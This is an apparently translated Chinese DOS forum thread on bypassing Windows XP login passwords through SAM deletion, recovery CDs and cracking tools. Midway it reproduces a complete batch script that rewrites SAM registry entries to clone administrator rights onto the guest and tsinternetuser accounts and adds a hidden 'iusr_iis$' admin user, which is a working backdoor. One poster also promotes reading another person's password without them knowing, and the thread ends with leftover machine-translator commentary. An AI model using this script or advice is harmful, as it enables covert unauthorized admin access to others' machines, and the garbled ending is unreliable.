中国DOS联盟

What you said is problematic. Deleting sam in XP will make the host unable to log in. It's still okay in 98. I haven't used ME, 2000, NT, but it's not okay in XP. If the sam file is broken, it will make the system fall into an infinite loop. The password cracking tool in MS-DOS can be used, it's an exe file, not large and very convenient. My home http://www.oookillooo.ys168.com/ I will do my best to help with problems. Help give a boost. Thanks.

I don't know how, but it seems that discharging on Winxp might work

Originally posted by weilong888 at 2006-5-23 22:06:
Don't be so annoying. Go to DOS, delete the SAM file, and there will be no information set by the original user. You can enter without a password.

This method is effective for Windows 2000, but not for XP and 2003 systems.

http://www.password-changer.com/download.htm

This topic has had many versions in relevant magazines and on the internet. Some say it works, some say it doesn't, making people confused and at a loss. It's very necessary to practice!
I remember there was a special introduction in the April issue of Dian Ai Magazine this year! Now there are many people repeating what others say. Most people haven't tried all systems and possible environments on their own computers, or there may be particularities in their own computer situations.

Last edited by 雨露 on 2007-2-24 at 09:24 PM ]

Download the Deep Mountain Red Leaf System Maintenance CD Version V25. There are options on the CD boot system menu to recover passwords.

ghost Elevate Privileges.. Found in the forum.

@echo guest.bat ^<zpid^> ^<password^>
@echo __________________________________________________________
@rem This guest.bat automatically clones guest to the administrators group.
@rem If username exists, it means running the bat in a terminal login environment. Need to manually enter the pid value.
@rem It's best to manually modify the password first. Execute this program twice. Haha. Mainly because there's no obfuscation. regedit is time-consuming.
@set zpath=%path%
@set zcd=%cd%
@set path=%path%;%windir%;%windir%\system32

:start
@net user guest |find /i "*Domain" &&echo Domain Controller, Dont clone. ADD user! &&goto DOMAIN
@if NOT "%USERNAME%"=="" echo username=,term_login mode. input PID. &&goto Term

:start1
@pulist.exe |findstr.exe /i "WINLOGON.exe" >a
@setx.exe a -f a -a 0,1 >b
@FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (b) do @set zpid=%%i
@goto AUTO

:Term
@if "%1"=="" goto USAGE
@if NOT "%2"=="" net user guest %2
@if NOT "%2"=="" net user |find /i "tsinternetuser" >nul &&net user tsinternetuser %2
@set zpid=%1


:AUTO
@echo Make admg.reg admt.reg admiis.reg
@psu.exe -p "%windir%\regedit.exe -e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -e name.$$$ HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names" -i %zpid% >nul
@echo Windows Registry Editor Version 5.00 >admg.reg
@echo Windows Registry Editor Version 5.00 >admt.reg
@echo >>admg.reg
@echo >>admt.reg
@type admin.reg >a &echo "Unicode -->>> ansi . find.exe use it ansi." &if exist b del b
@echo "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,\>>b
@setx.exe a -f a -a 4,0 |find "," >>b
@setx.exe a -f a -a 5,0 |find "," >>b
@setx.exe a -f a -a 6,0 |find "," >>b
@type b >>admg.reg
@type b >>admt.reg

:IIS
@set zda=no
@echo iusr_iis exec
@type name.$$$ >name.reg
@copy name.reg name.txt >nul
@FOR /L %%i IN (5,3,30) DO @(setx.exe a -f name.reg -a %%i,0 |find /i "IUSR_IIS$" &&set zda=%%i)
@if "%zda%" =="no" goto PSU
@rep.exe "IUSR_IIS$" name.txt /R /I >nul
@rep.exe "Editor" name.txt /R /I >nul
@find.exe /v /n "" name.txt >n1
@findstr /I "%zda%" n1 >name.iis
@setx a -f name.iis -a 0,1 -d () >zdc
@del n1
@del name.iis
@del name.$$$
@del name.txt
@del a
@del b

@For /F "tokens=1,2* delims= " %%i in (zdc) do @(echo %%i>zdd)
@For /F "tokens=1,2* delims= " %%i in (zdd) do @(set zdd=%%i)
@copy admg.reg admiis.reg >nul
@echo rep.exe "1f5" "%zdd%" admiis.reg /I
@rep.exe "1f5" "%zdd%" admiis.reg /I
@del zdc
@del zdd

:PSU
@attrib -s -r admg.bak >nul
@attrib -s -r admt.bak >nul
@copy admg.bak admg.reg >nul
@copy admt.bak admt.reg >nul
@psu.exe -p "%windir%\regedit.exe -s admg.reg" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -s admt.reg" -i %zpid% >nul

@if NOT "%zda%"=="no" psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid% >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:yes >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:no >nul

@copy admg.reg admg.bak >nul
@copy admt.reg admt.bak >nul
@attrib admg.bak +r +s >nul
@attrib admt.bak +r +s >nul

@net user guest /active:yes >nul
@net user guest /active:no >nul
@net user |find /I "tsinternetuser" || goto NEXT
@net user tsinternetuser /active:yes >nul
@net user tsinternetuser /active:no >nul
@if exist admin.reg del admin.reg /f >nul
@if exist admg.reg del admg.reg /f >nul
@if exist admt.reg del admt.reg /f >nul
:Next
@goto end


:DOMAIN
@rem add user iusr_iis$
@if "%2"=="" echo "not input guest of password" &&goto END
@net user |find /i "iusr_iis" >nul ||net user iusr_iis$ %2 /add
@net localgroup administrators |find /i "iusr_iis$" >nul ||net localgroup administrators iusr_iis$ /add
@goto END

:USAGE
@pulist.exe |findstr.exe /i "WINLOGON explorer"
@echo " system.bat zpid <password> "
@echo " Need cur winlogon PID ,Term_mode，Must this Term_login_winlogon_pid. "
@goto end1

:END
@echo ________ALL User IN administrators :
@net localgroup administrators
:END1
@echo psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid%
@set path=%zpath%
@set zpath=
@set zcd=
@set zda=
@set zdb=
@set zdd=
@set zpid=

What if the GUEST user is disabled? So it's still better to use a dedicated recovery CD to achieve it.

Typing "set" shows the password, which is really stupid.

The function of "set" is to display and set environment variables. Saying it can display the password is really.....

What the 16th floor said is right. Don't post "you can log in by deleting the sam file" again to avoid misleading.

Got it, if I forget the password in the future, there will be a way to get it back.

You can download my USB flash drive system (in the multimedia section). There is a WINXPE in it. After booting, there is a program to directly view the password of the XP system on the hard drive. It is better than cracking the password for two reasons: First, you want to know the password of someone else's machine but don't want others to know that you have touched their machine; Second, NTFS has an encryption function. If you directly clear the password, such as PASSWD under DOS, it may make encrypted files unopenable (not tried, just guessed). So use my system, it is in Chinese version (you can change the language in OPTION). Everyone can try it. I used to like network security very much and got the Network Security Engineer certificate in 2003, but I have never engaged in this kind of work. Let everyone laugh.

Let's try it, whether it's true or false.

Typically, the `SET` command alone won't display passwords directly. Are you sure you're using the right context or there are specific conditions? Let me double - check. Wait, no, according to general usage, the `SET` command doesn't reveal passwords by default. So the translation of your text is: Input SET can see the password??? Why can't I see it?